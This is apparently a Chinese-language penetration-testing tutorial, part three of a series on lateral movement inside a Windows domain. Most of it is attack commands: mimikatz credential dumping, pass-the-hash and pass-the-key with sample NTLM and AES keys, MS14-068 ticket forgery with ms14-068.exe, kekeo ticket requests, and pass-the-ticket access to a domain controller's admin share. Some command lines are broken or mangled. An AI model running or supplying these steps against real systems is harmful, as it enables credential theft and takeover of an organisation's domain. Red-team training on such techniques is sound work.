内网渗透-横向移动 三

PTH传递

先获取到域控这边的NTLM

执行命令  

privilege::debug

sekurlsa::logonpasswords

然后在域内主机用mimikatz连接

sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

c成功后会弹出一个新的cmd 直接在这里面连接域控就可以   

PTK传递

如果打补丁的话就需要PTK

这个用到的比较少

sekurlsa::ekeys #获取 aes

sekurlsa::pth /user:mary /domain:god/aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

PTT票据传递

第一种方法 利用漏洞MS14-068  能实现普通用户直接获取域控 system 权限 但是这个漏洞比较老 基本见不到

先sid 

whoami/user

然后用mimikatz清空机器中所有凭证 如果有域成员凭证会影响凭证伪造

kerberos::purge

查看一下当前机器凭证

利用 ms14-068 生成 TGT 数据

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码

MS14-068.exe -u [email protected] -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -

p admin!@#45

4.票据注入内存

kerberos::ptc [email protected]

利用

dir \\192.168.3.21\c$

利用工具 kekeo

1.生成票据

kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"

2.导入票据

kerberos::ptt [email protected][email protected]

还有就是K8的工具ladon